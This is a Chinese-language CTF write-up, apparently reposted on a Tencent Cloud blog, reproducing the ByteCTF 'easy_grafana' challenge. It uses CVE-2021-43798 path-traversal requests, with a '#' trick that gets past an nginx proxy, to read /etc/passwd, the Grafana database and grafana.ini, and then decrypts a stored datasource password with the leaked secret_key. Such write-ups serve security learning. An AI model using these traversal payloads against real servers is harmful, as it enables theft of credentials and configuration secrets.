ByteCTF-web复现

pankas

发布于 2022-10-05 16:23:46

2170

发布于 2022-10-05 16:23:46

文章被收录于专栏：pankas的技术分享pankas的技术分享

easy_grafana

打开发现是grafana的登录界面，下面有对应的版本号，直接网上搜一搜有无对应的CVE

找到了 CVE-2021-43798 ，存在任意文件读取漏洞

网站做了nginx的反代，直接用现有的payload访问会报400的错误

参考https://blog.riskivy.com/grafana-%e4%bb%bb%e6%84%8f%e6%96%87%e4%bb%b6%e8%af%bb%e5%8f%96%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90%e4%b8%8e%e6%b1%87%e6%80%bbcve-2021-43798/

构造

/public/plugins/text/#/../../../../../../../../../../etc/passwd

可实现任意文件读取

但更目录没有flag，环境变量文件也是空的，但是可以读取数据库文件和配置文件

/public/plugins/text/#/../../../../../../../../../../var/lib/grafana/grafana.db

读取下载得到数据库文件

使用navicat打开

但也没有找到flag

尝试使用工具解密数据库文件中的内容

工具 https://github.com/jas502n/Grafana-CVE-2021-43798

读取配置文件

/public/plugins/text/#/../../../../../../../../../../etc/grafana/grafana.ini

得到 secret_key

secret_key = SW2YcwTIb9zpO1hoPsMm

得到的数据库文件中找到data_source的密码

得到 dataSourcePassword

{"password":"b0NXeVJoSXKPoSYIWt8i/GfPreRT03fO6gbMhzkPefodqe1nvGpdSROTvfHK1I3kzZy9SQnuVy9c3lVkvbyJcqRwNT6/"}

解密mysql 数据库密码得到flag

本文参与腾讯云自媒体分享计划，分享自作者个人站点/博客。

原始发表：2022-09-27，如有侵权请联系 cloudcommunity@tencent.com 删除

数据库

sql

https

网络安全

本文分享自作者个人站点/博客前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体分享计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度

ByteCTF-web复现

ByteCTF-web复现

easy_grafana

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐